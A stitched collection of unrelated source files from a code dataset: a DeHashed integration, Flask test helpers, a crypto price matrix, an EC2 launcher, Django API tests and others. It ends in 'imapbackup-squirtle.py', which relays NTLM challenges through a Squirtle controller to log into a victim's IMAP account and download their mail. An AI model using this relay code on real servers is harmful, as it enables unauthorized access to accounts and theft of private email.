headers=headers,
headerTransform=pascalToSpace,
),
{
f"{INTEGRATION_CONTEXT_BRAND}.LastQuery(true)": last_query,
f"{INTEGRATION_CONTEXT_BRAND}.Search(val.Id==obj.Id)": query_entries,
},
filtered_results,
)
def email_command(client: Client, args: Dict[str, str]) -> tuple:
"""
This command returns data regarding a compromised email address
:param client: Demisto client
:param args:
- email: the email address that should be checked
:return: Demisto outputs
"""
email_address = argToList(args.get('email'))
result = client.dehashed_search('email', email_address, 'contains')
if not isinstance(result, dict):
raise DemistoException(f"Got unexpected output from api: {result}")
query_data = result.get("entries")
if not query_data:
context = {
'DBotScore':
{
'Indicator': email_address[0],
'Type': 'email',
'Vendor': INTEGRATION_CONTEXT_BRAND,
'Score': 0
}
}
return "No matching results found", context, None
else:
default_dbot_score_email = 2 if client.email_dbot_score == 'SUSPICIOUS' else 3
query_entries = createContext(query_data, keyTransform=underscoreToCamelCase)
sources = [entry.get('obtained_from') for entry in query_data if entry.get('obtained_from')]
headers = [key.replace("_", " ") for key in [*query_data[0].keys()]]
hr = tableToMarkdown(f'DeHashed Search - got total results: {result.get("total")}', query_data, headers=headers,
headerTransform=pascalToSpace)
dbot_score = default_dbot_score_email if len(sources) > 0 else 0
context = {
f'{INTEGRATION_CONTEXT_BRAND}.Search(val.Id==obj.Id)': query_entries,
'DBotScore': create_dbot_score_dictionary(email_address[0], 'email', dbot_score)
}
return hr, context, query_data
def main():
"""
PARSE AND VALIDATE INTEGRATION PARAMS
"""
email = demisto.params().get("credentials", {}).get('identifier', '')
api_key = demisto.params().get("credentials", {}).get('password', '')
base_url = BASE_URL
verify_certificate = not demisto.params().get("insecure", False)
proxy = demisto.params().get("proxy", False)
email_dbot_score = demisto.params().get('email_dbot_score', 'SUSPICIOUS')
LOG(f"Command being called is {demisto.command()}")
try:
client = Client(
base_url,
verify=verify_certificate,
email=email,
api_key=api_key,
proxy=proxy,
headers={"accept": "application/json"},
email_dbot_score=email_dbot_score
)
if demisto.command() == "test-module":
# This is the call made when pressing the integration Test button.
result = test_module(client)
demisto.results(result)
elif demisto.command() == "dehashed-search":
return_outputs(*dehashed_search_command(client, demisto.args()))
elif demisto.command() == "email":
return_outputs(*email_command(client, demisto.args()))
else:
return_error('Command not found.')
# Log exceptions
except Exception as e:
return_error(f"Failed to execute {demisto.command()} command. Error: {str(e)}")
if __name__ in ("__main__", "__builtin__", "builtins"):
main()
| mit | -7,711,274,168,360,616,000 | 35.69375 | 120 | 0.590785 | false |
dacb/viscount | tests/utils.py | 1 | 5572 | """
utilities for unit testing
authorization header encoding and a batteries-included flask test
case mixin class
"""
import base64
import hmac
from datetime import datetime, timedelta
from hashlib import sha1
import simplejson as json
from werkzeug.utils import parse_cookie
def get_auth_headers(username=None, password=None):
username = username or 'username'
password = password or 'password'
encoded = base64.b64encode('%s:%s' % (username, password))
return {'Authorization': 'Basic ' + encoded}
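# e.g. get_auth_headers('user', 'pass')
#      -> {'Authorization': 'Basic dXNlcjpwYXNz'}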
class FlaskTestCaseMixin(object):
def _create_csrf_token(self):
csrf_key = 'csrf_token'
with self.client.session_transaction() as session:
session['csrf'] = csrf_key
secret_key = self.app.config['SECRET_KEY']
expires = (datetime.now() + timedelta(minutes=30)).strftime('%Y%m%d%H%M%S')
csrf_build = '%s%s' % (csrf_key, expires)
csrf_token = csrf_build.encode('utf8')
csrf_hmac = hmac.new(secret_key, csrf_token, digestmod=sha1)
self.csrf_token = '%s##%s' % (expires, csrf_hmac.hexdigest())
def _html_data(self, kwargs):
if 'data' in kwargs:
kwargs['data']['csrf_token'] = self.csrf_token
if not kwargs.get('content_type'):
kwargs['content_type'] = 'application/x-www-form-urlencoded'
return kwargs
def _json_data(self, kwargs, csrf_enabled=True):
if 'data' in kwargs:
kwargs['data']['csrf_token'] = self.csrf_token
kwargs['data'] = json.dumps(kwargs['data'])
if not kwargs.get('content_type'):
kwargs['content_type'] = 'application/json'
return kwargs
def _request(self, method, *args, **kwargs):
kwargs.setdefault('content_type', 'text/html')
kwargs.setdefault('follow_redirects', True)
return method(*args, **kwargs)
def _jrequest(self, *args, **kwargs):
return self._request(*args, **kwargs)
def get(self, *args, **kwargs):
return self._request(self.client.get, *args, **kwargs)
def post(self, *args, **kwargs):
return self._request(self.client.post, *args, **self._html_data(kwargs))
def put(self, *args, **kwargs):
return self._request(self.client.put, *args, **self._html_data(kwargs))
def delete(self, *args, **kwargs):
return self._request(self.client.delete, *args, **kwargs)
def jget(self, *args, **kwargs):
return self._jrequest(self.client.get, *args, **kwargs)
def jpost(self, *args, **kwargs):
return self._jrequest(self.client.post, *args, **self._json_data(kwargs))
def jput(self, *args, **kwargs):
return self._jrequest(self.client.put, *args, **self._json_data(kwargs))
def jdelete(self, *args, **kwargs):
return self._jrequest(self.client.delete, *args, **kwargs)
def getCookies(self, response):
cookies = {}
for value in response.headers.get_all("Set-Cookie"):
cookies.update(parse_cookie(value))
return cookies
def assertStatusCode(self, response, status_code):
"""Assert the status code of a Flask test client response
:param response: The test client response object
:param status_code: The expected status code
"""
self.assertEquals(status_code, response.status_code)
return response
def assertOk(self, response):
"""Test that response status code is 200
:param response: The test client response object
"""
return self.assertStatusCode(response, 200)
def assertBadRequest(self, response):
"""Test that response status code is 400
:param response: The test client response object
"""
return self.assertStatusCode(response, 400)
def assertForbidden(self, response):
"""Test that response status code is 403
:param response: The test client response object
"""
return self.assertStatusCode(response, 403)
def assertNotFound(self, response):
"""Test that response status code is 404
:param response: The test client response object
"""
return self.assertStatusCode(response, 404)
def assertContentType(self, response, content_type):
"""Assert the content-type of a Flask test client response
:param response: The test client response object
:param content_type: The expected content type
"""
self.assertEquals(content_type, response.headers['Content-Type'])
return response
def assertOkHtml(self, response):
"""Assert the response status code is 200 and an HTML response
:param response: The test client response object
"""
return self.assertOk(
self.assertContentType(response, 'text/html; charset=utf-8'))
def assertJson(self, response):
"""Test that content returned is in JSON format
:param response: The test client response object
"""
return self.assertContentType(response, 'application/json')
def assertOkJson(self, response):
"""Assert the response status code is 200 and a JSON response
:param response: The test client response object
"""
return self.assertOk(self.assertJson(response))
def assertBadJson(self, response):
"""Assert the response status code is 400 and a JSON response
:param response: The test client response object
"""
return self.assertBadRequest(self.assertJson(response))
def assertCookie(self, response, name):
"""Assert the response contains a cookie with the specified name
:param response: The test client response object
:param key: The cookie name
:param value: The value of the cookie
"""
self.assertIn(name, self.getCookies(response))
def assertCookieEquals(self, response, name, value):
"""Assert the response contains a cookie with the specified value
:param response: The test client response object
:param name: The cookie name
:param value: The value of the cookie
"""
self.assertEquals(value, self.getCookies(response).get(name, None))
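    # A minimal usage sketch (hypothetical create_app factory; the mixin must
    # precede unittest.TestCase in the bases so these helpers win the MRO):
    # class ExampleTest(FlaskTestCaseMixin, unittest.TestCase):
    #     def setUp(self):
    #         self.app = create_app('testing')
    #         self.client = self.app.test_client()
    #         self._create_csrf_token()
    #     def test_home(self):
    #         self.assertOkHtml(self.get('/'))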
| bsd-2-clause | 521,881,412,278,953,400 | 29.282609 | 77 | 0.71949 | false |
kumkee/SURF2016 | src/marketdata/globalpricematrix.py | 1 | 3459 | from coinlist import CoinList
import pandas as pd
from time import time
from time import sleep
import numpy as np
NOW = 0
FIVE_MINUTES = 60*5
FIFTEEN_MINUTES = FIVE_MINUTES * 3
HALF_HOUR = FIFTEEN_MINUTES * 2
HOUR = HALF_HOUR * 2
TWO_HOUR = HOUR * 2
FOUR_HOUR = HOUR * 4
DAY = HOUR * 24
YEAR = DAY * 365
CSV_DEFAULT = 'pm.csv'
COIN_REF = 'LTC'
class GlobalPriceMatrix(CoinList):
def __init__(self, start = DAY, end = NOW, period = HALF_HOUR, csv = None, coin_filter = 0.2):
        if csv:
            self.__getPriceFromFile(csv)
        else:
            super(GlobalPriceMatrix, self).__init__()
            self._coin_filter = coin_filter
            self.__getPriceFromExchange(start, end, period)
def __getPriceFromExchange(self, start, end, period):
t = time()
self._start = t - start
        self._end = t - end + 10*period  # pad the end by a few periods so the newest candles are included
self._period = period
self.__coinFilter()
self.__checkperiod()
coin = COIN_REF
chart = self.getChart(coin, start = self._start, end = self._end)
cols = [d['date'] for d in chart]
self._pm = pd.DataFrame(index = self._coins, columns = cols).astype('float32')
self.__fillPriceRow(coin, start = self._start, end = self._end)
for c in self._coins:
if c == COIN_REF:
continue
self.__fillPriceRow(c, start = self._start, end = self._end)
def __fillPriceRow(self, coin, start, end):
chart = self.getChart(coin=coin, start=start, end=end)
for c in chart:
self._pm.at[coin, c['date']] = c['close']
@property
def pricedata(self):
return self._pm
@property
def pricematrix(self):
return self._pm.as_matrix()
def getChart(self, coin, start, end):
chart = self.polo.marketChart( \
pair = self.allActiveCoins.at[coin, 'pair'], \
start = start, \
end = end, \
period = self._period )
return chart
def __coinFilter(self):
if(self._coin_filter):
self._coins = self.topNVolume(
n = int(len(self.allActiveCoins) * self._coin_filter)).index
def to_csv(self, filepath = CSV_DEFAULT):
#Save the database into csv file
pm = self._pm.transpose()
pm.index = pd.to_datetime(pm.index, unit = 's')
pm.to_csv(filepath)
def __getPriceFromFile(self, csv = CSV_DEFAULT):
pm = pd.DataFrame.from_csv(csv).astype('float32')
pm.index = pm.index.astype(np.int64)/10**9
self._pm = pm.transpose()
self._start = self._pm.columns[0]
self._end = self._pm.columns[-1]
self._period = self._pm.columns[1] - self._start
    def __checkperiod(self):
        if self._period not in (FIVE_MINUTES, FIFTEEN_MINUTES, HALF_HOUR,
                                TWO_HOUR, FOUR_HOUR, DAY):
            raise ValueError('period has to be 5min, 15min, 30min, 2hr, 4hr, or a day')
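# A minimal usage sketch (assumes Poloniex access is configured via CoinList;
# CSV_DEFAULT is the 'pm.csv' constant above):
# gpm = GlobalPriceMatrix(start=DAY, period=HALF_HOUR)
# gpm.to_csv()
# reloaded = GlobalPriceMatrix(csv=CSV_DEFAULT)
# print(reloaded.pricematrix.shape)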
| gpl-3.0 | 28,672,610,416,348,292 | 27.121951 | 98 | 0.558832 | false |
jangorecki/h2o-3 | ec2/h2o-cluster-launch-instances.py | 1 | 4600 | #!/usr/bin/env python
import os
import sys
import time
import boto
import boto.ec2
# Environment variables you MUST set (either here or by passing them in).
# -----------------------------------------------------------------------
#
os.environ['AWS_ACCESS_KEY_ID'] = ''
os.environ['AWS_SECRET_ACCESS_KEY'] = ''
os.environ['AWS_SSH_PRIVATE_KEY_FILE'] = ''
# Launch EC2 instances with an IAM role
# --------------------------------------
#
iam_profile_resource_name = None
# or
iam_profile_name = None
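# e.g. to launch with an instance profile, set exactly one of the two
# variables above (values below are hypothetical):
#   iam_profile_resource_name = 'arn:aws:iam::123456789012:instance-profile/h2o'
#   iam_profile_name = 'h2o'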
# Options you MUST tailor to your own AWS account.
# ------------------------------------------------
# SSH key pair name.
keyName = ''
# AWS security group name.
# Note:
# H2O uses TCP and UDP ports 54321 and 54322.
# RStudio uses TCP port 8787.
securityGroupName = 'SecurityDisabled'
# Options you might want to change.
# ---------------------------------
numInstancesToLaunch = 2
instanceType = 'm3.2xlarge'
instanceNameRoot = 'h2o-instance'
# Options to help debugging.
# --------------------------
debug = 0
# debug = 1
dryRun = False
# dryRun = True
# Options you should not change unless you really mean to.
# --------------------------------------------------------
regionName = 'us-east-1'
amiId = 'ami-0b100e61'
#regionName = 'us-west-1'
#amiID = 'ami-c1afd6a1'
#--------------------------------------------------------------------------
# No need to change anything below here.
#--------------------------------------------------------------------------
# Note: this python script was initially developed with boto 2.13.3.
def botoVersionMismatch():
print 'WARNING: Unsupported boto version. Please upgrade boto to at least 2.13.x and try again.'
print 'Comment this out to run anyway.'
print 'Exiting.'
sys.exit(1)
if not 'AWS_ACCESS_KEY_ID' in os.environ:
print 'ERROR: You must set AWS_ACCESS_KEY_ID in the environment.'
sys.exit(1)
if not 'AWS_SECRET_ACCESS_KEY' in os.environ:
print 'ERROR: You must set AWS_SECRET_ACCESS_KEY in the environment.'
sys.exit(1)
if not 'AWS_SSH_PRIVATE_KEY_FILE' in os.environ:
print 'ERROR: You must set AWS_SSH_PRIVATE_KEY_FILE in the environment.'
sys.exit(1)
publicFileName = 'nodes-public'
privateFileName = 'nodes-private'
if not dryRun:
fpublic = open(publicFileName, 'w')
fprivate = open(privateFileName, 'w')
print 'Using boto version', boto.Version
botoVersionArr = boto.Version.split(".")
# require boto 2.13.x or newer; version components are strings, so compare as ints
if int(botoVersionArr[0]) != 2 or int(botoVersionArr[1]) < 13:
    botoVersionMismatch()
if (debug):
boto.set_stream_logger('h2o-ec2')
ec2 = boto.ec2.connect_to_region(regionName, debug=debug)
print 'Launching', numInstancesToLaunch, 'instances.'
reservation = ec2.run_instances(
image_id=amiId,
min_count=numInstancesToLaunch,
max_count=numInstancesToLaunch,
key_name=keyName,
instance_type=instanceType,
security_groups=[securityGroupName],
instance_profile_arn=iam_profile_resource_name,
instance_profile_name=iam_profile_name,
dry_run=dryRun
)
for i in range(numInstancesToLaunch):
instance = reservation.instances[i]
print 'Waiting for instance', i+1, 'of', numInstancesToLaunch, '...'
instance.update()
while instance.state != 'running':
print ' .'
time.sleep(1)
instance.update()
print ' instance', i+1, 'of', numInstancesToLaunch, 'is up.'
name = instanceNameRoot + str(i)
instance.add_tag('Name', value=name)
print
print 'Creating output files: ', publicFileName, privateFileName
print
for i in range(numInstancesToLaunch):
instance = reservation.instances[i]
instanceName = ''
if 'Name' in instance.tags:
instanceName = instance.tags['Name'];
print 'Instance', i+1, 'of', numInstancesToLaunch
print ' Name: ', instanceName
print ' PUBLIC: ', instance.public_dns_name
print ' PRIVATE:', instance.private_ip_address
print
fpublic.write(instance.public_dns_name + '\n')
fprivate.write(instance.private_ip_address + '\n')
fpublic.close()
fprivate.close()
print 'Sleeping for 60 seconds for ssh to be available...'
time.sleep(60)
d = os.path.dirname(os.path.realpath(__file__))
print 'Testing ssh access...'
cmd = d + '/' + 'h2o-cluster-test-ssh.sh'
rv = os.system(cmd)
if rv != 0:
print 'Failed.'
sys.exit(1)
print
print 'Distributing flatfile...'
cmd = d + '/' + 'h2o-cluster-distribute-flatfile.sh'
rv = os.system(cmd)
if rv != 0:
print 'Failed.'
sys.exit(1)
# Distribute flatfile script already prints success when it completes.
| apache-2.0 | 4,029,750,662,069,026,000 | 25.900585 | 102 | 0.622391 | false |
oksome/Tumulus | tumulus/tag.py | 1 | 1267 | # -*- coding: utf-8 -*-
# This file is part of Tumulus.
#
# Copyright (C) 2013 OKso (http://okso.me)
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
See reference: http://www.javascriptkit.com/domref/elementproperties.shtml
'''
from .element import Element, EmptyElement
class Tag(object):
def __init__(self, tagname, element=Element):
self.tagname = tagname
self.element = element
def __call__(self, *inner, **kwargs):
return self.element(self.tagname, components=inner, attributes=kwargs)
class EmptyTag(Tag):
    def __call__(self, *inner, **kwargs):
        # void elements take no children, so any inner content is ignored
        return EmptyElement(self.tagname, attributes=kwargs)
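# A minimal usage sketch (assumes Element/EmptyElement render to HTML when
# serialized; tag names are illustrative):
# div = Tag('div')
# br = EmptyTag('br')
# page = div('hello', br(), id='greeting')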
| agpl-3.0 | 2,938,885,543,379,877,000 | 30.675 | 78 | 0.713496 | false |
ned14/tnfox | Python/aliases.py | 1 | 1055 | #! /usr/bin/python
# Copyright 2004 Roman Yakovenko.
# Distributed under the Boost Software License, Version 1.0. (See
# accompanying file LICENSE_1_0.txt or copy at
# http://www.boost.org/LICENSE_1_0.txt)
db = {
"QPtrVector<FX::FXWindow>" : "QPtrVectorOfFXWindow"
, "QMemArray<unsigned char>" : "QMemArrayOfUnsignedChar"
, "QValueList<FX::Pol::knowReferrers::ReferrerEntry>" : "QValueListOfReferrerEntry"
, "FXIPCMsgChunkCodeAlloc<0,false>" : "FXIPCMsgChunkCodeAlloc0False"
, "FXIPCMsgChunkCodeAlloc<4,false>" : "FXIPCMsgChunkCodeAlloc4False"
, "QPtrVector<FX::Generic::BoundFunctorV>" : "QPtrVectorOfBoundFunctorV"
, "FXObjectListOf<FX::FXListItem>" : "FXObjectListOfFXListItem"
, "FXObjectListOf<FX::FXHeaderItem>" : "FXObjectListOfFXHeaderItem"
, "QValueList<FX::FXString>" : "QValueListOfFXString"
, "FXObjectListOf<FX::FXIconItem>" : "FXObjectListOfFXIconItem"
, "FXIPCMsgChunkCodeAlloc<0,true>" : "FXIPCMsgChunkCodeAlloc0True"
, "FXIPCMsgChunkCodeAlloc<2,false>" : "FXIPCMsgChunkCodeAlloc2False"
} | lgpl-2.1 | -204,368,758,546,424,260 | 51.8 | 87 | 0.737441 | false |
Calvinxc1/Data_Analytics | blog/2017-01-08/oldschool_linear.py | 1 | 2522 | #%% libraries
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
#%% gradient descent linear regression function
def grad_descent(dataset, features, predictor, learn_rate, max_iters = 10000):
def initialize_model(dataset, features, predictor):
constant_array = np.ones(shape = (len(dataset), 1))
features_array = dataset.loc[:, features].values
features_array = np.append(constant_array, features_array, axis = 1)
predict_array = dataset.loc[:, predictor].values
betas = np.zeros(shape = (len(features) + 1, len(predictor)))
return (features_array, predict_array, betas)
def calc_gradient(features_array, predict_array, betas):
prediction = np.dot(features_array, betas)
predict_error = predict_array - prediction
gradient = -2 * np.dot(features_array.transpose(), predict_error)
return gradient
def update_betas(gradient, betas, learn_rate):
new_betas = betas - (gradient * learn_rate)
return new_betas
def model_error(features_array, predict_array, betas):
prediction = np.dot(features_array, betas)
predict_error = predict_array - prediction
model_error = np.sqrt(np.mean(predict_error ** 2))
return model_error
features_array, predict_array, betas = initialize_model(dataset, features, predictor)
prior_error = np.inf
for iter_count in range(max_iters):
gradient = calc_gradient(features_array, predict_array, betas)
betas = update_betas(gradient, betas, learn_rate)
curr_error = model_error(features_array, predict_array, betas)
        if curr_error == prior_error:
            # RMSE stopped changing; exact float equality is crude but
            # suffices for this demo
            break
        prior_error = curr_error
return (betas, iter_count, curr_error)
#%% model test collection
house_data = pd.read_csv('kc_house_data.csv')
features = ['sqft_living', 'bedrooms', 'bathrooms']
predictor = ['price']
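# Sanity-check sketch via the normal equations (illustrative; assumes X'X is
# invertible and should match the betas gradient descent converges to):
# X = np.append(np.ones((len(house_data), 1)), house_data[features].values, axis=1)
# exact = np.linalg.solve(X.T.dot(X), X.T.dot(house_data[predictor].values))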
low_learn = 11.041
high_learn = 11.05
learn_splits = 2500
learn_rates = [10 ** -(i / float(learn_splits)) for i in range(int(low_learn * learn_splits), int(high_learn * learn_splits))]  # float() keeps the division correct under Python 2 too
model_errors = []
iter_counts = []
beta_record = []
for learn_rate in learn_rates:
(betas, iter_count, curr_error) = grad_descent(house_data, features, predictor, learn_rate, max_iters = int(10e3))
model_errors.append(curr_error)
iter_counts.append(iter_count)
beta_record.append(betas)
#%%
plt.plot(np.log(model_errors[0:18]))
#%%
plt.plot(model_errors[17:32])
#%%
plt.plot(iter_counts) | gpl-3.0 | 6,453,053,014,177,452,000 | 39.047619 | 119 | 0.666138 | false |
jfterpstra/bluebottle | bluebottle/recurring_donations/tests/test_api.py | 1 | 5153 | from django.core.urlresolvers import reverse
from rest_framework import status
from bluebottle.bb_projects.models import ProjectPhase
from bluebottle.geo.models import Country
from bluebottle.test.factory_models.accounts import BlueBottleUserFactory
from bluebottle.test.factory_models.geo import CountryFactory
from bluebottle.test.factory_models.projects import ProjectFactory
from bluebottle.test.utils import BluebottleTestCase
class MonthlyDonationApiTest(BluebottleTestCase):
def setUp(self):
super(MonthlyDonationApiTest, self).setUp()
self.init_projects()
self.phase_campaign = ProjectPhase.objects.get(slug='campaign')
self.country = CountryFactory()
self.some_project = ProjectFactory.create(amount_asked=500,
status=self.phase_campaign)
self.another_project = ProjectFactory.create(amount_asked=750,
status=self.phase_campaign)
self.some_user = BlueBottleUserFactory.create()
self.some_user_token = "JWT {0}".format(self.some_user.get_jwt_token())
self.another_user = BlueBottleUserFactory.create()
self.another_user_token = "JWT {0}".format(
self.another_user.get_jwt_token())
self.monthly_donation_url = reverse('monthly-donation-list')
self.monthly_donation_project_url = reverse('monthly-donation-project-list')
self.monthly_profile = {'iban': 'NL13TEST0123456789',
'bic': 'TESTNL2A',
'name': 'Nijntje het Konijntje',
'city': 'Amsterdam',
'country': self.country.id,
'amount': u'50.00'}
def test_create_monthly_donation(self):
"""
Tests for creating, retrieving, updating monthly donation.
"""
# Check that user has no monthly donation
response = self.client.get(self.monthly_donation_url,
token=self.some_user_token)
self.assertEqual(response.status_code, status.HTTP_200_OK,
response.data)
self.assertEqual(response.data['count'], 0)
self.assertEqual(response.data['results'], [])
# Create a new monthly donation
response = self.client.post(self.monthly_donation_url,
self.monthly_profile,
token=self.some_user_token)
self.assertEqual(response.status_code, status.HTTP_201_CREATED,
response.data)
self.assertEqual(response.data['amount'],
self.monthly_profile['amount'])
self.assertEqual(response.data['active'], True)
some_monthly_donation_id = response.data['id']
# Reload it and check that all is still well.
response = self.client.get(self.monthly_donation_url,
token=self.some_user_token)
self.assertEqual(response.status_code, status.HTTP_200_OK,
response.data)
self.assertEqual(response.data['count'], 1)
self.assertEqual(response.data['results'][0]['amount'],
self.monthly_profile['amount'])
# Add a preferred projects
monthly_project = {
'donation': some_monthly_donation_id,
'project': self.some_project.slug
}
response = self.client.post(self.monthly_donation_project_url,
monthly_project,
token=self.some_user_token)
self.assertEqual(response.status_code, status.HTTP_201_CREATED,
response.data)
# Reload it. It should have that project embedded
response = self.client.get(self.monthly_donation_url,
token=self.some_user_token)
self.assertEqual(response.status_code, status.HTTP_200_OK,
response.data)
self.assertEqual(len(response.data['results'][0]['projects']), 1)
self.assertEqual(response.data['results'][0]['projects'][0]['project'],
self.some_project.slug)
# Another should not have a monthly donation
response = self.client.get(self.monthly_donation_url,
token=self.another_user_token)
self.assertEqual(response.status_code, status.HTTP_200_OK,
response.data)
self.assertEqual(response.data['count'], 0)
# Another user can't add a project to first monthly donation
monthly_project = {
'donation': some_monthly_donation_id,
'project': self.another_project.slug
}
response = self.client.post(self.monthly_donation_project_url,
monthly_project,
token=self.another_user_token)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN,
response.data)
| bsd-3-clause | -2,161,579,183,659,187,500 | 45.423423 | 84 | 0.579856 | false |
grutz/squirtle | evilagents/imapbackup-squirtle.py | 1 | 23800 | #!/usr/bin/env python
"""IMAP Incremental Backup Script"""
__version__ = "1.4a-squirtle"
__author__ = "Rui Carmo (http://the.taoofmac.com)"
__copyright__ = "(C) 2006 Rui Carmo. Code under BSD License.\n(C)"
__contributors__ = "Bob Ippolito, Michael Leonhard, Giuseppe Scrivano <[email protected]>, Kurt Grutzmacher <[email protected]>"
# = Contributors =
# Giuseppe Scrivano: Added support for folders.
# Michael Leonhard: LIST result parsing, SSL support, revamped argument processing,
# moved spinner into class, extended recv fix to Windows
# Bob Ippolito: fix for MemoryError on socket recv, http://python.org/sf/1092502
# Rui Carmo: original author, up to v1.2e
# Kurt Grutzmacher: Squirtle support, use Maildir instead of mbox
# = TODO =
# - Add proper exception handlers to scanFile() and downloadMessages()
# - Migrate mailbox usage from rfc822 module to email module
# - Investigate using the noseek mailbox/email option to improve speed
# - Use the email module to normalize downloaded messages
# and add missing Message-Id
# - Test parseList() and its descendents on other imapds
# - Test bzip2 support
# - Add option to download only subscribed folders
# - Add regex option to filter folders
# - Use a single IMAP command to get Message-IDs
# - Use a single IMAP command to fetch the messages
# - Add option to turn off spinner. Since sys.stdin.isatty() doesn't work on
# Windows, redirecting output to a file results in junk output.
# - Patch Python's ssl module to do proper checking of certificate chain
# - Patch Python's ssl module to raise good exceptions
# - Submit patch of socket._fileobject.read
# - Improve imaplib module with LIST parsing code, submit patch
# DONE:
# v1.3c
# - Add SSL support
# - Support host:port
# - Cleaned up code using PyLint to identify problems
# pylint -f html --indent-string=" " --max-line-length=90 imapbackup.py > report.html
import getpass, os, gc, sys, time, platform, getopt
import mailbox, imaplib, socket
import re, sha, gzip, bz2
import urllib, urllib2, simplejson
class SkipFolderException(Exception):
"""Indicates aborting processing of current folder, continue with next folder."""
pass
class Spinner:
"""Prints out message with cute spinner, indicating progress"""
def __init__(self, message):
"""Spinner constructor"""
self.glyphs = "|/-\\"
self.pos = 0
self.message = message
sys.stdout.write(message)
sys.stdout.flush()
self.spin()
def spin(self):
"""Rotate the spinner"""
if sys.stdin.isatty():
sys.stdout.write("\r" + self.message + " " + self.glyphs[self.pos])
sys.stdout.flush()
self.pos = (self.pos+1) % len(self.glyphs)
def stop(self):
"""Erase the spinner from the screen"""
if sys.stdin.isatty():
sys.stdout.write("\r" + self.message + " ")
sys.stdout.write("\r" + self.message)
sys.stdout.flush()
def pretty_byte_count(num):
"""Converts integer into a human friendly count of bytes, eg: 12.243 MB"""
if num == 1:
return "1 byte"
elif num < 1024:
return "%s bytes" % (num)
elif num < 1048576:
return "%.2f KB" % (num/1024.0)
elif num < 1073741824:
return "%.3f MB" % (num/1048576.0)
elif num < 1099511627776:
return "%.3f GB" % (num/1073741824.0)
else:
return "%.3f TB" % (num/1099511627776.0)
# Regular expressions for parsing
MSGID_RE = re.compile("^Message\-Id\: (.+)", re.IGNORECASE + re.MULTILINE)
BLANKS_RE = re.compile(r'\s+', re.MULTILINE)
# Constants
UUID = '19AF1258-1AAF-44EF-9D9A-731079D6FAD7' # Used to generate Message-Ids
def process_type2(msg2, sqkey='', squri="http://localhost:8080/", squser="squirtle", sqpass="eltriuqs"):
msg2 = urllib.quote(msg2)
auth_handler = urllib2.HTTPBasicAuthHandler()
auth_handler.add_password(realm='Squirtle Realm',
uri=squri,
user=squser,
passwd=sqpass)
urlopener = urllib2.build_opener(auth_handler)
urllib2.install_opener(urlopener)
dutchieurl = "%scontroller/type2?key=%s&type2=%s" % (squri, sqkey, msg2)
try:
res = urllib2.urlopen(dutchieurl)
except urllib2.URLError, e:
print '*** Error talking to Squirtle.' + str(e.code) + ': ' + e.reason + '\n'
return ''
response = res.read()
try:
response = simplejson.loads(response)
except Exception, e:
print '*** Error receiving response from Squirtle: ' + response + '\n'
return ''
    if response['status'] == 'ok':
        return response['result']
    # non-ok status: report it and return an empty Type 3 so the caller aborts
    print '*** Response from Squirtle: ' + response['status'] + '\n'
    return ''
def login_squirtle(server, sqkey):
"""Login as a user using the Squirtle API"""
    typ, dat = server.capability()
    if "NTLM" not in str(dat):
        raise server.error("!!! IMAP server does not support NTLM !!!")
server.send("0001 AUTHENTICATE NTLM\r\n")
dat = server.readline()
if "+" not in dat:
raise server.error("!!! Did not receive IMAP challenge: %s" % (dat))
# generic ntlm type 1 message
server.send("TlRMTVNTUAABAAAABzIAAAYABgArAAAACwALACAAAABXT1JLU1RBVElPTkRPTUFJTg==\r\n")
dat = server.readline()
if "+" not in dat:
raise server.error("!!! Invalid response: %s" % (dat))
msg3 = process_type2(dat[2:].strip(), sqkey, "http://localhost:8080/", "squirtle", "eltriuqs")
if len(msg3) > 0:
server.send("%s\r\n" % msg3)
dat = server.readline()
if "0001 OK" not in dat:
raise server.error("!!! Did not receive OK message: %s" % (dat))
server.state = 'AUTH'
else:
raise server.error("!!! No response from Squirtle")
return
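# The NTLM exchange driven above, in brief (Type 3 is computed by Squirtle
# from a captured client session rather than from a password):
#   C: 0001 AUTHENTICATE NTLM
#   S: +
#   C: <base64 Type 1 negotiate>
#   S: + <base64 Type 2 challenge>
#   C: <base64 Type 3 response>
#   S: 0001 OK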
def download_messages(server, mpath, foldername, messages, config):
"""Download messages from folder and append to maildr folder"""
# nothing to do
if not len(messages):
print "New messages: 0"
return
mbox = mailbox.Maildir(mpath)
try:
mbox = mbox.get_folder(foldername)
    except mailbox.NoSuchMailboxError:
mbox = mbox.add_folder(foldername)
spinner = Spinner("Downloading %s new messages to %s" % (len(messages), foldername))
total = biggest = 0
# each new message
for msg_id in messages.keys():
# fetch message
typ, data = server.fetch(messages[msg_id], "RFC822")
assert('OK' == typ)
text = data[0][1].strip().replace('\r','')
mbox.add(text)
size = len(text)
biggest = max(size, biggest)
total += size
del data
gc.collect()
spinner.spin()
mbox.clean()
mbox.close()
spinner.stop()
print ": %s total, %s for largest message" % (pretty_byte_count(total),
pretty_byte_count(biggest))
def scan_file(mpath, foldername, compress, overwrite):
"""Gets IDs of messages in the specified maildir folder"""
spinner = Spinner("File %s" % (foldername))
mbox = mailbox.Maildir(mpath)
try:
mbox = mbox.get_folder(foldername)
except mailbox.NoSuchMailboxError:
mbox = mbox.add_folder(foldername)
messages = {}
# each message
i = 0
for message in mbox:
        # We assume all messages on disk have message-ids
        # (MaildirMessage is an email.message.Message, so use get() instead of
        # the old rfc822 getfirstmatchingheader() API)
        msg_id_value = message.get('message-id')
        if msg_id_value is None:
            # No message ID was found. Warn the user and move on
            print
            print "WARNING: Message #%d in %s" % (i, foldername),
            print "has no Message-Id header."
            spinner.spin()
            i = i + 1
            continue
        header = 'Message-Id: %s' % msg_id_value
header = BLANKS_RE.sub(' ', header.strip())
try:
msg_id = MSGID_RE.match(header).group(1)
if msg_id not in messages.keys():
# avoid adding dupes
messages[msg_id] = msg_id
except AttributeError:
# Message-Id was found but could somehow not be parsed by regexp
# (highly bloody unlikely)
print
print "WARNING: Message #%d in %s" % (i, foldername),
print "has a malformed Message-Id header."
spinner.spin()
i = i + 1
# done
mbox.close()
spinner.stop()
print ": %d messages" % (len(messages.keys()))
return messages
def scan_folder(server, foldername):
"""Gets IDs of messages in the specified folder, returns id:num dict"""
